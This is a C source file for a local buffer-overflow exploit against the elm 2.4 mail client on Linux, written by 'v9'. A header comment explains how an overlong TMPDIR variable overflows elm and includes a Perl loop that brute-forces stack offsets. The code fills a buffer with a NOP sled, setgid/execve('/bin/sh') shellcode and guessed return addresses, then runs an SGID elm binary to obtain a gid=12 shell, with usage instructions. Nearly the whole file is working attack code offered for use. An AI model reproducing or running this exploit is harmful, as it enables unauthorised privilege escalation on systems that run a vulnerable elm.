/* (linux)elm[2.4] buffer overflow, by v9[v9@fakehalo.org].  this will give you
   a gid=12 shell if /usr/bin/elm is SGID(=2755).  elm rejects most user
   defined vars after 254<characters but TMPDIR overflows a few characters
   before that in some situations.  both elm 2.4 and 2.5(current) have this
   overflow, but elm 2.5's can be handled differently. (elm_bof25.c)

   note: try offsets of 100, as noted in the perl script below.  800 worked on
   my old slackware 3.6, (elm 2.4 PL25).  it is possible you may need to modify
   this to your system. (probably not though)

   yeah, i obviously was looking around the elm source to find this.  too much
   free time for me.  although, i also noticed that just typing too much in elm
   will make it segfault. :)

   here is a quick perl script to run offsets (until ctrl-c):

   #!/usr/bin/perl
   $i=$ARGV[0];
   $i=$ARGV[0];
   while(1){
    print "offset: $i.\n";
    system("rm /tmp/mbox.\$USER;./elm_bof25 $i");
    $i++; # or $i+=100; if you want to be speedy. (which you do)
   } */

#define DEFAULT_OFFSET 800
static char exec[]=
 "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76\x08\x31\xc0\x88"
 "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
 "\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bof[242];
 int i,offset;
 long ret;
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 ret=(esp()-offset);
 printf("return address: 0x%lx, offset: %d.\n\nwhen ELM loads press \"m\" to send mail, then enter\ngarbage values until you get to the message editor(vi).\nyou also might want to run \"reset\".\n",ret,offset);
 sleep(5);
 for(i=2;i<242;i+=4){*(long *)&bof[i]=ret;}
 for(i=0;i<(238-strlen(exec));i++){*(bof+i)=0x90;}
 memcpy(bof+i,exec,strlen(exec));
 setenv("TMPDIR",bof,1);
 execlp("/usr/bin/elm","elm",0);
}